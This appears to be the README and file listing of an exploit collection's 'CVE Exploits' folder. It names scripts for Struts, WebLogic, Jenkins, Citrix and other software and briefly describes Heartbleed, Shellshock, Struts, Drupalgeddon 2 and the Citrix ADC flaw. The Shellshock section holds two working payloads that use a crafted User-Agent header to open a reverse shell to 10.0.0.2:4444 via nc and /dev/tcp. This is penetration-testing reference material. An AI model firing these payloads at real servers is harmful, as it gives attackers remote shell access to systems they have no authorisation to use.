PayloadsAllTheThings/CVE Exploits
2020-01-22 17:49:03 +00:00
..
Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py Fix name's capitalization 2019-03-07 00:07:55 +01:00
Apache Struts 2 CVE-2017-9805.py Fix name's capitalization 2019-03-07 00:07:55 +01:00
Apache Struts 2 CVE-2018-11776.py Fix name's capitalization 2019-03-07 00:07:55 +01:00
Citrix CVE-2019-19781.py ADDED CVE: CVE-2019-19781 2020-01-22 17:47:38 +00:00
Docker API RCE.py Fix name's capitalization 2019-03-07 00:07:55 +01:00
Drupalgeddon2 CVE-2018-7600.rb Fix name's capitalization 2019-03-07 00:07:55 +01:00
Heartbleed CVE-2014-0160.py Fix name's capitalization 2019-03-07 00:07:55 +01:00
JBoss CVE-2015-7501.py Fix name's capitalization 2019-03-07 00:07:55 +01:00
Jenkins CVE-2015-8103.py Fix name's capitalization 2019-03-07 00:07:55 +01:00
Jenkins CVE-2016-0792.py Fix name's capitalization 2019-03-07 00:07:55 +01:00
Jenkins Groovy Console.py Fix name's capitalization 2019-03-07 00:07:55 +01:00
Rails CVE-2019-5420.rb SAML exploitation + ASREP roasting + Kerbrute 2019-03-24 13:16:23 +01:00
README.md Add Technology Affected 2020-01-22 17:49:03 +00:00
Shellshock CVE-2014-6271.py Fix name's capitalization 2019-03-07 00:07:55 +01:00
Tomcat CVE-2017-12617.py Fix name's capitalization 2019-03-07 00:07:55 +01:00
vBulletin RCE 5.0.0 - 5.5.4.sh RCE vBulletin + findomain 2019-09-26 20:41:01 +02:00
WebLogic CVE-2016-3510.py Fix name's capitalization 2019-03-07 00:07:55 +01:00
WebLogic CVE-2017-10271.py Fix name's capitalization 2019-03-07 00:07:55 +01:00
WebLogic CVE-2018-2894.py Fix name's capitalization 2019-03-07 00:07:55 +01:00
WebSphere CVE-2015-7450.py Fix name's capitalization 2019-03-07 00:07:55 +01:00

Common Vulnerabilities and Exposures

Big CVEs in the last 5 years.

CVE-2014-0160 - Heartbleed

The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).

CVE-2014-6271 - Shellshock

Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 10.0.0.2 4444 -e /bin/sh\r\n"
curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/4444 0>&1" "https://10.0.0.1/cgi-bin/admin.cgi" 

CVE-2017-5638 - Apache Struts 2

On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header.

CVE-2018-7600 - Drupalgeddon 2

A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.

CVE-2019-19781 - Citrix ADC Netscaler

A remote code execution vulnerability in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.

Technology Affect:

  • Citrix ADC and Citrix Gateway version 13.0 all supported builds
  • Citrix ADC and NetScaler Gateway version 12.1 all supported builds
  • Citrix ADC and NetScaler Gateway version 12.0 all supported builds
  • Citrix ADC and NetScaler Gateway version 11.1 all supported builds
  • Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds

Thanks to